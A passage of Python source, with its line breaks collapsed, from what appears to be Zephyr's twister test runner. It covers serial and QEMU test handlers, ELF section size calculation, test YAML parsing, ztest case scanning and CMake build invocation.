self.run_custom_script(pre_script, 30) try: ser = serial.Serial( serial_device, baudrate=hardware.baud, 
parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=self.timeout ) except serial.SerialException as e: self.set_state("failed", 0) self.instance.reason = "Failed" logger.error("Serial device error: %s" % (str(e))) if serial_pty and ser_pty_process: ser_pty_process.terminate() outs, errs = ser_pty_process.communicate() logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs)) self.make_device_available(serial_device) return ser.flush() harness_name = self.instance.testcase.harness.capitalize() harness_import = HarnessImporter(harness_name) harness = harness_import.instance harness.configure(self.instance) read_pipe, write_pipe = os.pipe() start_time = time.time() t = threading.Thread(target=self.monitor_serial, daemon=True, args=(ser, read_pipe, harness)) t.start() d_log = "{}/device.log".format(self.instance.build_dir) logger.debug('Flash command: %s', command) try: stdout = stderr = None with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc: try: (stdout, stderr) = proc.communicate(timeout=30) logger.debug(stdout.decode()) if proc.returncode != 0: self.instance.reason = "Device issue (Flash?)" with open(d_log, "w") as dlog_fp: dlog_fp.write(stderr.decode()) os.write(write_pipe, b'x') # halt the thread out_state = "flash_error" except subprocess.TimeoutExpired: proc.kill() (stdout, stderr) = proc.communicate() self.instance.reason = "Device issue (Timeout)" with open(d_log, "w") as dlog_fp: dlog_fp.write(stderr.decode()) except subprocess.CalledProcessError: os.write(write_pipe, b'x') # halt the thread if post_flash_script: self.run_custom_script(post_flash_script, 30) t.join(self.timeout) if t.is_alive(): logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name)) out_state = "timeout" if ser.isOpen(): ser.close() if serial_pty: ser_pty_process.terminate() outs, errs = ser_pty_process.communicate() logger.debug("Process {} 
terminated outs: {} errs {}".format(serial_pty, outs, errs)) os.close(write_pipe) os.close(read_pipe) handler_time = time.time() - start_time if out_state in ["timeout", "flash_error"]: self.add_missing_testscases(harness) if out_state == "timeout": self.instance.reason = "Timeout" elif out_state == "flash_error": self.instance.reason = "Flash error" if harness.is_pytest: harness.pytest_run(self.log) self.instance.results = harness.tests # sometimes a test instance hasn't been executed successfully with an # empty dictionary results, in order to include it into final report, # so fill the results as BLOCK if self.instance.results == {}: for k in self.instance.testcase.cases: self.instance.results[k] = 'BLOCK' if harness.state: self.set_state(harness.state, handler_time) if harness.state == "failed": self.instance.reason = "Failed" else: self.set_state(out_state, handler_time) if post_script: self.run_custom_script(post_script, 30) self.make_device_available(serial_device) self.record(harness) class QEMUHandler(Handler): """Spawns a thread to monitor QEMU output from pipes We pass QEMU_PIPE to 'make run' and monitor the pipes for output. We need to do this as once qemu starts, it runs forever until killed. Test cases emit special messages to the console as they run, we check for these to collect whether the test passed or failed. """ def __init__(self, instance, type_str): """Constructor @param instance Test instance """ super().__init__(instance, type_str) self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo") self.pid_fn = os.path.join(instance.build_dir, "qemu.pid") if "ignore_qemu_crash" in instance.testcase.tags: self.ignore_qemu_crash = True self.ignore_unexpected_eof = True else: self.ignore_qemu_crash = False self.ignore_unexpected_eof = False @staticmethod def _get_cpu_time(pid): """get process CPU time. 
The guest virtual time in QEMU icount mode isn't host time and it's maintained by counting guest instructions, so we use QEMU process exection time to mostly simulate the time of guest OS. """ proc = psutil.Process(pid) cpu_time = proc.cpu_times() return cpu_time.user + cpu_time.system @staticmethod def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness, ignore_unexpected_eof=False): fifo_in = fifo_fn + ".in" fifo_out = fifo_fn + ".out" # These in/out nodes are named from QEMU's perspective, not ours if os.path.exists(fifo_in): os.unlink(fifo_in) os.mkfifo(fifo_in) if os.path.exists(fifo_out): os.unlink(fifo_out) os.mkfifo(fifo_out) # We don't do anything with out_fp but we need to open it for # writing so that QEMU doesn't block, due to the way pipes work out_fp = open(fifo_in, "wb") # Disable internal buffering, we don't # want read() or poll() to ever block if there is data in there in_fp = open(fifo_out, "rb", buffering=0) log_out_fp = open(logfile, "wt") start_time = time.time() timeout_time = start_time + timeout p = select.poll() p.register(in_fp, select.POLLIN) out_state = None line = "" timeout_extended = False pid = 0 if os.path.exists(pid_fn): pid = int(open(pid_fn).read()) while True: this_timeout = int((timeout_time - time.time()) * 1000) if this_timeout < 0 or not p.poll(this_timeout): try: if pid and this_timeout > 0: #there's possibility we polled nothing because #of not enough CPU time scheduled by host for #QEMU process during p.poll(this_timeout) cpu_time = QEMUHandler._get_cpu_time(pid) if cpu_time < timeout and not out_state: timeout_time = time.time() + (timeout - cpu_time) continue except ProcessLookupError: out_state = "failed" break if not out_state: out_state = "timeout" break if pid == 0 and os.path.exists(pid_fn): pid = int(open(pid_fn).read()) if harness.is_pytest: harness.handle(None) out_state = harness.state break try: c = in_fp.read(1).decode("utf-8") except UnicodeDecodeError: # Test is writing something 
weird, fail out_state = "unexpected byte" break if c == "": # EOF, this shouldn't happen unless QEMU crashes if not ignore_unexpected_eof: out_state = "unexpected eof" break line = line + c if c != "\n": continue # line contains a full line of data output from QEMU log_out_fp.write(line) log_out_fp.flush() line = line.strip() logger.debug(f"QEMU ({pid}): {line}") harness.handle(line) if harness.state: # if we have registered a fail make sure the state is not # overridden by a false success message coming from the # testsuite if out_state not in ['failed', 'unexpected eof', 'unexpected byte']: out_state = harness.state # if we get some state, that means test is doing well, we reset # the timeout and wait for 2 more seconds to catch anything # printed late. We wait much longer if code # coverage is enabled since dumping this information can # take some time. if not timeout_extended or harness.capture_coverage: timeout_extended = True if harness.capture_coverage: timeout_time = time.time() + 30 else: timeout_time = time.time() + 2 line = "" if harness.is_pytest: harness.pytest_run(logfile) out_state = harness.state handler.record(harness) handler_time = time.time() - start_time logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds") if out_state == "timeout": handler.instance.reason = "Timeout" handler.set_state("failed", handler_time) elif out_state == "failed": handler.instance.reason = "Failed" handler.set_state("failed", handler_time) elif out_state in ['unexpected eof', 'unexpected byte']: handler.instance.reason = out_state handler.set_state("failed", handler_time) else: handler.set_state(out_state, handler_time) log_out_fp.close() out_fp.close() in_fp.close() if pid: try: if pid: os.kill(pid, signal.SIGTERM) except ProcessLookupError: # Oh well, as long as it's dead! 
User probably sent Ctrl-C pass os.unlink(fifo_in) os.unlink(fifo_out) def handle(self): self.results = {} self.run = True # We pass this to QEMU which looks for fifos with .in and .out # suffixes. self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo") self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid") if os.path.exists(self.pid_fn): os.unlink(self.pid_fn) self.log_fn = self.log harness_import = HarnessImporter(self.instance.testcase.harness.capitalize()) harness = harness_import.instance harness.configure(self.instance) self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread, args=(self, self.timeout, self.build_dir, self.log_fn, self.fifo_fn, self.pid_fn, self.results, harness, self.ignore_unexpected_eof)) self.instance.results = harness.tests self.thread.daemon = True logger.debug("Spawning QEMUHandler Thread for %s" % self.name) self.thread.start() if sys.stdout.isatty(): subprocess.call(["stty", "sane"]) logger.debug("Running %s (%s)" % (self.name, self.type_str)) command = [self.generator_cmd] command += ["-C", self.build_dir, "run"] is_timeout = False qemu_pid = None with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc: logger.debug("Spawning QEMUHandler Thread for %s" % self.name) try: proc.wait(self.timeout) except subprocess.TimeoutExpired: # sometimes QEMU can't handle SIGTERM signal correctly # in that case kill -9 QEMU process directly and leave # twister to judge testing result by console output is_timeout = True self.terminate(proc) if harness.state == "passed": self.returncode = 0 else: self.returncode = proc.returncode else: if os.path.exists(self.pid_fn): qemu_pid = int(open(self.pid_fn).read()) logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}") self.returncode = proc.returncode # Need to wait for harness to finish processing # output from QEMU. Otherwise it might miss some # error messages. 
self.thread.join(0) if self.thread.is_alive(): logger.debug("Timed out while monitoring QEMU output") if os.path.exists(self.pid_fn): qemu_pid = int(open(self.pid_fn).read()) os.unlink(self.pid_fn) logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}") if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state: self.set_state("failed", 0) if is_timeout: self.instance.reason = "Timeout" else: self.instance.reason = "Exited with {}".format(self.returncode) self.add_missing_testscases(harness) def get_fifo(self): return self.fifo_fn class SizeCalculator: alloc_sections = [ "bss", "noinit", "app_bss", "app_noinit", "ccm_bss", "ccm_noinit" ] rw_sections = [ "datas", "initlevel", "exceptions", "initshell", "_static_thread_data_area", "k_timer_area", "k_mem_slab_area", "k_mem_pool_area", "sw_isr_table", "k_sem_area", "k_mutex_area", "app_shmem_regions", "_k_fifo_area", "_k_lifo_area", "k_stack_area", "k_msgq_area", "k_mbox_area", "k_pipe_area", "net_if_area", "net_if_dev_area", "net_l2_area", "net_l2_data", "k_queue_area", "_net_buf_pool_area", "app_datas", "kobject_data", "mmu_tables", "app_pad", "priv_stacks", "ccm_data", "usb_descriptor", "usb_data", "usb_bos_desc", "uart_mux", 'log_backends_sections', 'log_dynamic_sections', 'log_const_sections', "app_smem", 'shell_root_cmds_sections', 'log_const_sections', "font_entry_sections", "priv_stacks_noinit", "_GCOV_BSS_SECTION_NAME", "gcov", "nocache", "devices", "k_heap_area", ] # These get copied into RAM only on non-XIP ro_sections = [ "rom_start", "text", "ctors", "init_array", "reset", "z_object_assignment_area", "rodata", "net_l2", "vector", "sw_isr_table", "settings_handler_static_area", "bt_l2cap_fixed_chan_area", "bt_l2cap_br_fixed_chan_area", "bt_gatt_service_static_area", "vectors", "net_socket_register_area", "net_ppp_proto", "shell_area", "tracing_backend_area", "ppp_protocol_handler_area", ] def __init__(self, filename, extra_sections): """Constructor @param filename Path to 
the output binary The <filename> is parsed by objdump to determine section sizes """ # Make sure this is an ELF binary with open(filename, "rb") as f: magic = f.read(4) try: if magic != b'\x7fELF': raise TwisterRuntimeError("%s is not an ELF binary" % filename) except Exception as e: print(str(e)) sys.exit(2) # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK. # GREP can not be used as it returns an error if the symbol is not # found. is_xip_command = "nm " + filename + \ " | awk '/CONFIG_XIP/ { print $3 }'" is_xip_output = subprocess.check_output( is_xip_command, shell=True, stderr=subprocess.STDOUT).decode( "utf-8").strip() try: if is_xip_output.endswith("no symbols"): raise TwisterRuntimeError("%s has no symbol information" % filename) except Exception as e: print(str(e)) sys.exit(2) self.is_xip = (len(is_xip_output) != 0) self.filename = filename self.sections = [] self.rom_size = 0 self.ram_size = 0 self.extra_sections = extra_sections self._calculate_sizes() def get_ram_size(self): """Get the amount of RAM the application will use up on the device @return amount of RAM, in bytes """ return self.ram_size def get_rom_size(self): """Get the size of the data that this application uses on device's flash @return amount of ROM, in bytes """ return self.rom_size def unrecognized_sections(self): """Get a list of sections inside the binary that weren't recognized @return list of unrecognized section names """ slist = [] for v in self.sections: if not v["recognized"]: slist.append(v["name"]) return slist def _calculate_sizes(self): """ Calculate RAM and ROM usage by section """ objdump_command = "objdump -h " + self.filename objdump_output = subprocess.check_output( objdump_command, shell=True).decode("utf-8").splitlines() for line in objdump_output: words = line.split() if not words: # Skip lines that are too short continue index = words[0] if not index[0].isdigit(): # Skip lines that do not start continue # with a digit name = words[1] # Skip lines 
with section names if name[0] == '.': # starting with '.' continue # TODO this doesn't actually reflect the size in flash or RAM as # it doesn't include linker-imposed padding between sections. # It is close though. size = int(words[2], 16) if size == 0: continue load_addr = int(words[4], 16) virt_addr = int(words[3], 16) # Add section to memory use totals (for both non-XIP and XIP scenarios) # Unrecognized section names are not included in the calculations. recognized = True if name in SizeCalculator.alloc_sections: self.ram_size += size stype = "alloc" elif name in SizeCalculator.rw_sections: self.ram_size += size self.rom_size += size stype = "rw" elif name in SizeCalculator.ro_sections: self.rom_size += size if not self.is_xip: self.ram_size += size stype = "ro" else: stype = "unknown" if name not in self.extra_sections: recognized = False self.sections.append({"name": name, "load_addr": load_addr, "size": size, "virt_addr": virt_addr, "type": stype, "recognized": recognized}) class TwisterConfigParser: """Class to read test case files with semantic checking """ def __init__(self, filename, schema): """Instantiate a new TwisterConfigParser object @param filename Source .yaml file to read """ self.data = {} self.schema = schema self.filename = filename self.tests = {} self.common = {} def load(self): self.data = scl.yaml_load_verify(self.filename, self.schema) if 'tests' in self.data: self.tests = self.data['tests'] if 'common' in self.data: self.common = self.data['common'] def _cast_value(self, value, typestr): if isinstance(value, str): v = value.strip() if typestr == "str": return v elif typestr == "float": return float(value) elif typestr == "int": return int(value) elif typestr == "bool": return value elif typestr.startswith("list") and isinstance(value, list): return value elif typestr.startswith("list") and isinstance(value, str): vs = v.split() if len(typestr) > 4 and typestr[4] == ":": return [self._cast_value(vsi, typestr[5:]) for vsi in vs] else: 
return vs elif typestr.startswith("set"): vs = v.split() if len(typestr) > 3 and typestr[3] == ":": return {self._cast_value(vsi, typestr[4:]) for vsi in vs} else: return set(vs) elif typestr.startswith("map"): return value else: raise ConfigurationError( self.filename, "unknown type '%s'" % value) def get_test(self, name, valid_keys): """Get a dictionary representing the keys/values within a test @param name The test in the .yaml file to retrieve data from @param valid_keys A dictionary representing the intended semantics for this test. Each key in this dictionary is a key that could be specified, if a key is given in the .yaml file which isn't in here, it will generate an error. Each value in this dictionary is another dictionary containing metadata: "default" - Default value if not given "type" - Data type to convert the text value to. Simple types supported are "str", "float", "int", "bool" which will get converted to respective Python data types. "set" and "list" may also be specified which will split the value by whitespace (but keep the elements as strings). finally, "list:<type>" and "set:<type>" may be given which will perform a type conversion after splitting the value up. "required" - If true, raise an error if not defined. If false and "default" isn't specified, a type conversion will be done on an empty string @return A dictionary containing the test key-value pairs with type conversion and default values filled in per valid_keys """ d = {} for k, v in self.common.items(): d[k] = v for k, v in self.tests[name].items(): if k in d: if isinstance(d[k], str): # By default, we just concatenate string values of keys # which appear both in "common" and per-test sections, # but some keys are handled in adhoc way based on their # semantics. 
if k == "filter": d[k] = "(%s) and (%s)" % (d[k], v) else: d[k] += " " + v else: d[k] = v for k, kinfo in valid_keys.items(): if k not in d: if "required" in kinfo: required = kinfo["required"] else: required = False if required: raise ConfigurationError( self.filename, "missing required value for '%s' in test '%s'" % (k, name)) else: if "default" in kinfo: default = kinfo["default"] else: default = self._cast_value("", kinfo["type"]) d[k] = default else: try: d[k] = self._cast_value(d[k], kinfo["type"]) except ValueError: raise ConfigurationError( self.filename, "bad %s value '%s' for key '%s' in name '%s'" % (kinfo["type"], d[k], k, name)) return d class Platform: """Class representing metadata for a particular platform Maps directly to BOARD when building""" platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "platform-schema.yaml")) def __init__(self): """Constructor. """ self.name = "" self.twister = True # if no RAM size is specified by the board, take a default of 128K self.ram = 128 self.ignore_tags = [] self.only_tags = [] self.default = False # if no flash size is specified by the board, take a default of 512K self.flash = 512 self.supported = set() self.arch = "" self.type = "na" self.simulation = "na" self.supported_toolchains = [] self.env = [] self.env_satisfied = True self.filter_data = dict() def load(self, platform_file): scp = TwisterConfigParser(platform_file, self.platform_schema) scp.load() data = scp.data self.name = data['identifier'] self.twister = data.get("twister", True) # if no RAM size is specified by the board, take a default of 128K self.ram = data.get("ram", 128) testing = data.get("testing", {}) self.ignore_tags = testing.get("ignore_tags", []) self.only_tags = testing.get("only_tags", []) self.default = testing.get("default", False) # if no flash size is specified by the board, take a default of 512K self.flash = data.get("flash", 512) self.supported = set() for supp_feature in 
data.get("supported", []): for item in supp_feature.split(":"): self.supported.add(item) self.arch = data['arch'] self.type = data.get('type', "na") self.simulation = data.get('simulation', "na") self.supported_toolchains = data.get("toolchain", []) self.env = data.get("env", []) self.env_satisfied = True for env in self.env: if not os.environ.get(env, None): self.env_satisfied = False def __repr__(self): return "<%s on %s>" % (self.name, self.arch) class DisablePyTestCollectionMixin(object): __test__ = False class ScanPathResult: """Result of the TestCase.scan_path function call. Attributes: matches A list of test cases warnings A string containing one or more warnings to display has_registered_test_suites Whether or not the path contained any calls to the ztest_register_test_suite macro. has_run_registered_test_suites Whether or not the path contained at least one call to ztest_run_registered_test_suites. has_test_main Whether or not the path contains a definition of test_main(void) """ def __init__(self, matches: List[str] = None, warnings: str = None, has_registered_test_suites: bool = False, has_run_registered_test_suites: bool = False, has_test_main: bool = False): self.matches = matches self.warnings = warnings self.has_registered_test_suites = has_registered_test_suites self.has_run_registered_test_suites = has_run_registered_test_suites self.has_test_main = has_test_main def __eq__(self, other): if not isinstance(other, ScanPathResult): return False return (sorted(self.matches) == sorted(other.matches) and self.warnings == other.warnings and (self.has_registered_test_suites == other.has_registered_test_suites) and (self.has_run_registered_test_suites == other.has_run_registered_test_suites) and self.has_test_main == other.has_test_main) class TestCase(DisablePyTestCollectionMixin): """Class representing a test application """ def __init__(self, testcase_root, workdir, name): """TestCase constructor. 
This gets called by TestSuite as it finds and reads test yaml files. Multiple TestCase instances may be generated from a single testcase.yaml, each one corresponds to an entry within that file. We need to have a unique name for every single test case. Since a testcase.yaml can define multiple tests, the canonical name for the test case is <workdir>/<name>. @param testcase_root os.path.abspath() of one of the --testcase-root @param workdir Sub-directory of testcase_root where the .yaml test configuration file was found @param name Name of this test case, corresponding to the entry name in the test case configuration file. For many test cases that just define one test, can be anything and is usually "test". This is really only used to distinguish between different cases when the testcase.yaml defines multiple tests """ self.source_dir = "" self.yamlfile = "" self.cases = [] self.name = self.get_unique(testcase_root, workdir, name) self.id = name self.type = None self.tags = set() self.extra_args = None self.extra_configs = None self.arch_allow = None self.arch_exclude = None self.skip = False self.platform_exclude = None self.platform_allow = None self.toolchain_exclude = None self.toolchain_allow = None self.tc_filter = None self.timeout = 60 self.harness = "" self.harness_config = {} self.build_only = True self.build_on_all = False self.slow = False self.min_ram = -1 self.depends_on = None self.min_flash = -1 self.extra_sections = None self.integration_platforms = [] @staticmethod def get_unique(testcase_root, workdir, name): canonical_testcase_root = os.path.realpath(testcase_root) if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents: # This is in ZEPHYR_BASE, so include path in name for uniqueness # FIXME: We should not depend on path of test for unique names. relative_tc_root = os.path.relpath(canonical_testcase_root, start=canonical_zephyr_base) else: relative_tc_root = "" # workdir can be "." 
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name)) check = name.split(".") if len(check) < 2: raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \ Tests should reference the category and subsystem with a dot as a separator. """ ) return unique @staticmethod def scan_file(inf_name): suite_regex = re.compile( # do not match until end-of-line, otherwise we won't allow # stc_regex below to catch the ones that are declared in the same # line--as we only search starting the end of this match br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,", re.MULTILINE) registered_suite_regex = re.compile( br"^\s*ztest_register_test_suite" br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,", re.MULTILINE) # Checks if the file contains a definition of "void test_main(void)" # Since ztest provides a plain test_main implementation it is OK to: # 1. register test suites and not call the run function iff the test # doesn't have a custom test_main. # 2. register test suites and a custom test_main definition iff the test # also calls ztest_run_registered_test_suites. test_main_regex = re.compile( br"^\s*void\s+test_main\(void\)", re.MULTILINE) stc_regex = re.compile( br"""^\s* # empy space at the beginning is ok # catch the case where it is declared in the same sentence, e.g: # # ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME)); # ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME), (?:ztest_ (?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*) [a-zA-Z0-9_]+\s*,\s* )? # Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME) ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)? # Consume the argument that becomes the extra testcse \(\s*(?P<stc_name>[a-zA-Z0-9_]+) # _setup_teardown() variant has two extra arguments that we ignore (?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)? 
\s*\)""", # We don't check how it finishes; we don't care re.MULTILINE | re.VERBOSE) suite_run_regex = re.compile( br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)", re.MULTILINE) registered_suite_run_regex = re.compile( br"^\s*ztest_run_registered_test_suites\(" br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)", re.MULTILINE) achtung_regex = re.compile( br"(#ifdef|#endif)", re.MULTILINE) warnings = None has_registered_test_suites = False has_run_registered_test_suites = False has_test_main = False with open(inf_name) as inf: if os.name == 'nt': mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ} else: mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ, 'offset': 0} with contextlib.closing(mmap.mmap(**mmap_args)) as main_c: suite_regex_match = suite_regex.search(main_c) registered_suite_regex_match = registered_suite_regex.search( main_c) if registered_suite_regex_match: has_registered_test_suites = True if registered_suite_run_regex.search(main_c): has_run_registered_test_suites = True if test_main_regex.search(main_c): has_test_main = True if not suite_regex_match and not has_registered_test_suites: # can't find ztest_test_suite, maybe a client, because # it includes ztest.h return ScanPathResult( matches=None, warnings=None, has_registered_test_suites=has_registered_test_suites, has_run_registered_test_suites=has_run_registered_test_suites, has_test_main=has_test_main) suite_run_match = suite_run_regex.search(main_c) if suite_regex_match and not suite_run_match: raise ValueError("can't find ztest_run_test_suite") if suite_regex_match: search_start = suite_regex_match.end() else: search_start = registered_suite_regex_match.end() if suite_run_match: search_end = suite_run_match.start() else: search_end = re.compile(br"\);", re.MULTILINE) \ .search(main_c, search_start) \ .end() achtung_matches = re.findall( achtung_regex, main_c[search_start:search_end]) if achtung_matches: 
warnings = "found invalid %s in ztest_test_suite()" \ % ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True)) _matches = re.findall( stc_regex, main_c[search_start:search_end]) for match in _matches: if not match.decode().startswith("test_"): warnings = "Found a test that does not start with test_" matches = [match.decode().replace("test_", "", 1) for match in _matches] return ScanPathResult( matches=matches, warnings=warnings, has_registered_test_suites=has_registered_test_suites, has_run_registered_test_suites=has_run_registered_test_suites, has_test_main=has_test_main) def scan_path(self, path): subcases = [] has_registered_test_suites = False has_run_registered_test_suites = False has_test_main = False for filename in glob.glob(os.path.join(path, "src", "*.c*")): try: result: ScanPathResult = self.scan_file(filename) if result.warnings: logger.error("%s: %s" % (filename, result.warnings)) raise TwisterRuntimeError( "%s: %s" % (filename, result.warnings)) if result.matches: subcases += result.matches if result.has_registered_test_suites: has_registered_test_suites = True if result.has_run_registered_test_suites: has_run_registered_test_suites = True if result.has_test_main: has_test_main = True except ValueError as e: logger.error("%s: can't find: %s" % (filename, e)) for filename in glob.glob(os.path.join(path, "*.c")): try: result: ScanPathResult = self.scan_file(filename) if result.warnings: logger.error("%s: %s" % (filename, result.warnings)) if result.matches: subcases += result.matches except ValueError as e: logger.error("%s: can't find: %s" % (filename, e)) if (has_registered_test_suites and has_test_main and not has_run_registered_test_suites): warning = \ "Found call to 'ztest_register_test_suite()' but no "\ "call to 'ztest_run_registered_test_suites()'" logger.error(warning) raise TwisterRuntimeError(warning) return subcases def parse_subcases(self, test_path): results = self.scan_path(test_path) for sub in results: name = 
"{}.{}".format(self.id, sub) self.cases.append(name) if not results: self.cases.append(self.id) def __str__(self): return self.name class TestInstance(DisablePyTestCollectionMixin): """Class representing the execution of a particular TestCase on a platform @param test The TestCase object we want to build/execute @param platform Platform object that we want to build and run against @param base_outdir Base directory for all test results. The actual out directory used is <outdir>/<platform>/<test case name> """ def __init__(self, testcase, platform, outdir): self.testcase = testcase self.platform = platform self.status = None self.reason = "Unknown" self.metrics = dict() self.handler = None self.outdir = outdir self.name = os.path.join(platform.name, testcase.name) self.build_dir = os.path.join(outdir, platform.name, testcase.name) self.run = False self.results = {} def __getstate__(self): d = self.__dict__.copy() return d def __setstate__(self, d): self.__dict__.update(d) def __lt__(self, other): return self.name < other.name @staticmethod def testcase_runnable(testcase, fixtures): can_run = False # console harness allows us to run the test and capture data. if testcase.harness in [ 'console', 'ztest', 'pytest']: can_run = True # if we have a fixture that is also being supplied on the # command-line, then we need to run the test, not just build it. fixture = testcase.harness_config.get('fixture') if fixture: can_run = (fixture in fixtures) elif testcase.harness: can_run = False else: can_run = True return can_run # Global testsuite parameters def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]): # right now we only support building on windows. running is still work # in progress. 
if os.name == 'nt': return False # we asked for build-only on the command line if self.testcase.build_only: return False # Do not run slow tests: skip_slow = self.testcase.slow and not enable_slow if skip_slow: return False target_ready = bool(self.testcase.type == "unit" or \ self.platform.type == "native" or \ self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \ filter == 'runnable') if self.platform.simulation == "nsim": if not find_executable("nsimdrv"): target_ready = False if self.platform.simulation == "mdb-nsim": if not find_executable("mdb"): target_ready = False if self.platform.simulation == "renode": if not find_executable("renode"): target_ready = False if self.platform.simulation == "tsim": if not find_executable("tsim-leon3"): target_ready = False testcase_runnable = self.testcase_runnable(self.testcase, fixtures) return testcase_runnable and target_ready def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]): # Create this in a "twister/" subdirectory otherwise this # will pass this overlay to kconfig.py *twice* and kconfig.cmake # will silently give that second time precedence over any # --extra-args=CONFIG_* subdir = os.path.join(self.build_dir, "twister") content = "" if self.testcase.extra_configs: content = "\n".join(self.testcase.extra_configs) if enable_coverage: if platform.name in coverage_platform: content = content + "\nCONFIG_COVERAGE=y" content = content + "\nCONFIG_COVERAGE_DUMP=y" if enable_asan: if platform.type == "native": content = content + "\nCONFIG_ASAN=y" if enable_ubsan: if platform.type == "native": content = content + "\nCONFIG_UBSAN=y" if content: os.makedirs(subdir, exist_ok=True) file = os.path.join(subdir, "testcase_extra.conf") with open(file, "w") as f: f.write(content) return content def calculate_sizes(self): """Get the RAM/ROM sizes of a test case. 
This can only be run after the instance has been executed by MakeGenerator, otherwise there won't be any binaries to measure. @return A SizeCalculator object """ fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf")) fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe"))) fns = [x for x in fns if not x.endswith('_prebuilt.elf')] if len(fns) != 1: raise BuildError("Missing/multiple output ELF binary") return SizeCalculator(fns[0], self.testcase.extra_sections) def fill_results_by_status(self): """Fills results according to self.status The method is used to propagate the instance level status to the test cases inside. Useful when the whole instance is skipped and the info is required also at the test cases level for reporting. Should be used with caution, e.g. should not be used to fill all results with passes """ status_to_verdict = { 'skipped': 'SKIP', 'error': 'BLOCK', 'failure': 'FAILED' } for k in self.results: self.results[k] = status_to_verdict[self.status] def __repr__(self): return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name) class CMake(): config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') def __init__(self, testcase, platform, source_dir, build_dir): self.cwd = None self.capture_output = True self.defconfig = {} self.cmake_cache = {} self.instance = None self.testcase = testcase self.platform = platform self.source_dir = source_dir self.build_dir = build_dir self.log = "build.log" self.generator = None self.generator_cmd = None def parse_generated(self): self.defconfig = {} return {} def run_build(self, args=[]): logger.debug("Building %s for %s" % (self.source_dir, self.platform.name)) cmake_args = [] cmake_args.extend(args) cmake = shutil.which('cmake') cmd = [cmake] + cmake_args kwargs = dict() if self.capture_output: kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = 
subprocess.STDOUT if self.cwd: kwargs['cwd'] = self.cwd p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() results = {} if p.returncode == 0: msg = "Finished building %s for %s" % (self.source_dir, self.platform.name) self.instance.status = "passed" results = {'msg': msg, "returncode": p.returncode, "instance": self.instance} if out: log_msg = out.decode(sys.getdefaultencoding()) with open(os.path.join(self.build_dir, self.log), "a") as log: log.write(log_msg) else: return None else: # A real error occurred, raise an exception log_msg = "" if out: log_msg = out.decode(sys.getdefaultencoding()) with open(os.path.join(self.build_dir, self.log), "a") as log: log.write(log_msg) if log_msg: res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg) if res and not self.overflow_as_errors: logger.debug("Test skipped due to {} Overflow".format(res[0])) self.instance.status = "skipped" self.instance.reason = "{} overflow".format(res[0]) else: self.instance.status = "error" self.instance.reason = "Build failure" results = { "returncode": p.returncode, "instance": self.instance, } return results def run_cmake(self, args=[]): if self.warnings_as_errors: ldflags = "-Wl,--fatal-warnings" cflags = "-Werror" aflags = "-Wa,--fatal-warnings" gen_defines_args = "--edtlib-Werror" else: ldflags = cflags = aflags = "" gen_defines_args = "" logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name)) cmake_args = [ f'-B{self.build_dir}', f'-S{self.source_dir}', f'-DEXTRA_CFLAGS="{cflags}"', f'-DEXTRA_AFLAGS="{aflags}', f'-DEXTRA_LDFLAGS="{ldflags}"', f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}', f'-G{self.generator}' ] args = ["-D{}".format(a.replace('"', '')) for a in args] cmake_args.extend(args) cmake_opts = ['-DBOARD={}'.format(self.platform.name)] cmake_args.extend(cmake_opts) logger.debug("Calling cmake with arguments: {}".format(cmake_args)) cmake = shutil.which('cmake') cmd = [cmake] + cmake_args kwargs = dict() if 
